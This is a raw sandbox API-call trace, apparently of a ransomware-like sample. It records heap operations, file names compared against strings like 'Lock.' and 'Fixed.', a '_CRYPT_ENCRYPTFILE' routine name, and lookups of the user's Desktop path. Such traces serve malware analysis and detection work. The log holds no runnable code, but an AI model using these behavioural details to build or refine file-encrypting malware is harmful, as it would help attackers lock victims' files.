[0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ItCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0216.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0216.160] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0216.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2e80060 [0216.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_BsqZItCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BsqZItCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sqZItCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qZItCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZItCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ItCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tCPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CPNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nq0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BuQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0216.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uQ.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0216.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0216.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0216.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0216.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0216.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0216.162] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0216.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0216.163] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0216.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0216.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0216.164] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0216.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0216.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53938 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0216.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0216.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0216.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0216.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0216.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0216.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0216.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0216.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0216.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0216.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0216.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0216.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0216.210] 